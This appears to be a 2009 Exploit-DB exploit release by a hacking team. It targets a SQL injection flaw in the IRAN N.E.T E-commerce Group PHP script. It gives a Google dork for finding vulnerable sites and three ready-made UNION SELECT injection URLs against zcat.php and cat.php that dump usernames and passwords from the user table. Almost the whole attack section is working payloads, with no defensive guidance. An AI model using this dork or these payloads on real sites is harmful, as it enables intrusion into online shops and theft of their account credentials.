IRAN N.E.T E-Commerce Group - SQL Injection

EDB-ID:

10350

CVE:

N/A




Platform:

PHP

Date:

2009-12-08


                                                    ALGERIAN HACKER
    **********************- NORTH-AFRICA SECURITY TEAM -***********************

  [!]            IRAN N.E.T E-commerce Group SQL Injection Vulnerability
  [!] Author    : Dr.0rYX and Cr3w-DZ
  [!] MAIL      : vx3@hotmail.de  &  Cr3w@hotmail.de

  ***************************************************************************/

  [ Software Information ]

  [+] Vendor : http://iranmc.org
  [+] script   : IRAN N.E.T E-commerce Group SQL Injection Vulnerability
  [+] Download : http://iranmc.org/index.php?id=7 sell (script with hosting)
  [+] Vulnerability : SQL injection
  [+] Dork :inurl:"zcat.php?id="

  **************************************************************************/
  [ Vulnerable File ]

  http://server/zcat.php?id=[N.A.S.T ]

  [ Exploit ]

  http://server/zcat.php?id=-1+union+select+1,2,concat(user,char(58),pass),4,5+from+user


  http://server/cat.php?id=-3+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4+from+user


  [ ExOMPLE ]

  http://server/zcat.php?id=-64+union+select+1,2,concat%28user,char%2858%29,pass%29,4,5+from+user

  [  GReet ]

  [+] :xcv-dz , CLAW , LE0N , hacker.ps , exploit-db.com , ALL HACKERS MUSLIMS